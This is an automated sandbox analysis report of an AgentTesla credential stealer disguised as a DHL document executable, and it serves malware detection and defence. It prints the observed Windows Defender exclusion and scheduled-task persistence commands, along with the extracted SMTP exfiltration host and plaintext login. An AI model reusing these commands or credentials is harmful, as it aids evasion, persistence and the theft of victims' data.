Loading ...

Play interactive tourEdit tour

Windows Analysis Report Dhl Document 7348255141.exe

Overview

General Information

Sample Name:Dhl Document 7348255141.exe
Analysis ID:532892
MD5:7fc06b21db75238cf0245b5264986778
SHA1:07e0398e78aaabaf936843fa764dd75b83c90210
SHA256:8dc051198d7b28764d674b92ee567d9a6ba4a15c69d51ed654861b9205546768
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Dhl Document 7348255141.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" MD5: 7FC06B21DB75238CF0245B5264986778)
    • powershell.exe (PID: 1988 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 4880 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "vicalee@4plqroup.com", "Password": "onvavLf8", "Host": "smtp.4plqroup.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000007.00000000.273408189.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    7.0.RegSvcs.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" , ParentImage: C:\Users\user\Desktop\Dhl Document 7348255141.exe, ParentProcessId: 4392, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6272
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" , ParentImage: C:\Users\user\Desktop\Dhl Document 7348255141.exe, ParentProcessId: 4392, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp, ProcessId: 4880
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" , ParentImage: C:\Users\user\Desktop\Dhl Document 7348255141.exe, ParentProcessId: 4392, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, ProcessId: 1988
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" , ParentImage: C:\Users\user\Desktop\Dhl Document 7348255141.exe, ParentProcessId: 4392, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6272
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dhl Document 7348255141.exe" , ParentImage: C:\Users\user\Desktop\Dhl Document 7348255141.exe, ParentProcessId: 4392, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe, ProcessId: 1988
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829758381567426.1988.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.Dhl Document 7348255141.exe.352e4e0.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "vicalee@4plqroup.com", "Password": "onvavLf8", "Host": "smtp.4plqroup.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Dhl Document 7348255141.exeMetadefender: Detection: 34%Perma Link
                      Source: Dhl Document 7348255141.exeReversingLabs: Detection: 65%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exeReversingLabs: Detection: 65%
                      Source: 7.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: Dhl Document 7348255141.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Dhl Document 7348255141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49808 -> 208.91.198.143:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49809 -> 208.91.198.143:587
                      Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                      Source: global trafficTCP traffic: 192.168.2.7:49808 -> 208.91.198.143:587
                      Source: global trafficTCP traffic: 192.168.2.7:49808 -> 208.91.198.143:587
                      Source: RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://aXZVkw.com
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmpString found in binary or memory: http://smtp.4plqroup.com
                      Source: RegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527902827.0000000002C15000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527994577.0000000002C2D000.00000004.00000001.sdmpString found in binary or memory: https://vDjxZe6kQogGh.org
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.4plqroup.com

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Dhl Document 7348255141.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE15E9139u002d2705u002d4790u002dB7F1u002d612E0004885Eu007d/u00373F23764u002d6BBEu002d4C8Fu002d8788u002d5D767D164C8F.csLarge array initialization: .cctor: array initializer size 11929
                      Source: 7.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE15E9139u002d2705u002d4790u002dB7F1u002d612E0004885Eu007d/u00373F23764u002d6BBEu002d4C8Fu002d8788u002d5D767D164C8F.csLarge array initialization: .cctor: array initializer size 11929
                      Source: 7.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE15E9139u002d2705u002d4790u002dB7F1u002d612E0004885Eu007d/u00373F23764u002d6BBEu002d4C8Fu002d8788u002d5D767D164C8F.csLarge array initialization: .cctor: array initializer size 11929
                      Source: 7.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE15E9139u002d2705u002d4790u002dB7F1u002d612E0004885Eu007d/u00373F23764u002d6BBEu002d4C8Fu002d8788u002d5D767D164C8F.csLarge array initialization: .cctor: array initializer size 11929
                      Source: 7.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE15E9139u002d2705u002d4790u002dB7F1u002d612E0004885Eu007d/u00373F23764u002d6BBEu002d4C8Fu002d8788u002d5D767D164C8F.csLarge array initialization: .cctor: array initializer size 11929
                      Source: Dhl Document 7348255141.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_0006514E
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B6458
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B6800
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B7C30
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B6802
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B4F77
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B4F88
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022BB06F
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B7F42
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeCode function: 0_2_022B7CD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C3609C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C34810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C394C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C31EC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C3EB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C4E498
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekeOfoSwJwszRDVeyktFaIjhnfTthjSTKSD.exe4 vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exe, 00000000.00000000.250974580.00000000000CA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInternal.exe@ vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.278853106.0000000004A00000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.279579984.0000000005330000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekeOfoSwJwszRDVeyktFaIjhnfTthjSTKSD.exe4 vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exeBinary or memory string: OriginalFilenameInternal.exe@ vs Dhl Document 7348255141.exe
                      Source: Dhl Document 7348255141.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: dlBewoIRuDWOY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Dhl Document 7348255141.exeMetadefender: Detection: 34%
                      Source: Dhl Document 7348255141.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile read: C:\Users\user\Desktop\Dhl Document 7348255141.exeJump to behavior
                      Source: Dhl Document 7348255141.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\Dhl Document 7348255141.exe "C:\Users\user\Desktop\Dhl Document 7348255141.exe"
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile created: C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exeJump to behavior
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAE43.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/1
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeMutant created: \Sessions\1\BaseNamedObjects\JEKoBKIPe
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_01
                      Source: Dhl Document 7348255141.exeString found in binary or memory: ../Images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: ../Images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: Class9537461636B4275696C6465725369!62745977476A434F%../Images/Play.gif'../Images/Pause.gif%../Images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: Class9537461636B4275696C6465725369!62745977476A434F%../Images/Play.gif'../Images/Pause.gif%../Images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: images/stop.gifp
                      Source: Dhl Document 7348255141.exeString found in binary or memory: images/stop.gifp
                      Source: Dhl Document 7348255141.exeString found in binary or memory: Images/stop.gif
                      Source: Dhl Document 7348255141.exeString found in binary or memory: Images/stop.gif
                      Source: 7.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Dhl Document 7348255141.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Dhl Document 7348255141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A02708 push es; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A043F2 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A043F2 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A07C0C pushad ; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A07C0C pushad ; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A01042 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A043F2 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A043F2 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A07C0C pushad ; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A07C0C pushad ; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_3_05A01042 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C4CE60 push edx; retn 0000h
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.94859375251
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.94859375251
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeFile created: C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
